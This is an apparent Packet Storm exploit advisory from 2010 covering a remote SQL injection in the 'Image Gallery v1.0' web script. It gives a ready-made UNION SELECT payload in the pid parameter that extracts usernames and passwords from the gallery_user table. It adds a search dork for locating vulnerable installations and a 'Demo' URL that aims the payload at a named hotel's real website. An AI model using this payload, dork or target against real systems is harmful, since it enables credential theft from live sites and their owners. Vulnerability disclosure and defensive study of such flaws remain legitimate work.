Image Gallery 1.0 SQL Injection

2010-01-22T00:00:00
ID PACKETSTORM:85506
Type packetstorm
Reporter Hussin X
Modified 2010-01-22T00:00:00

Description

                                        
                                            `Image Gallery v1.0 (pid) Remote SQL Injection Vulnerability  
___________________________________  
  
Author : Hussin X  
  
Home : IQ-SecuriTY > www.IQ-TY.com   
  
Mail : darkangel_G85@yahoo.com  
  
___________________________________  
  
script : http://www.elkagroup.com  
  
DorK : "Powered by : elkagroup.com"  
  
exploit :  
_______  
  
http://www.site.com/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--  
  
  
  
Demo :  
_______  
  
http://www.abbasihotel.com/gallery/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--  
  
  
Coding password : mysql  
  
`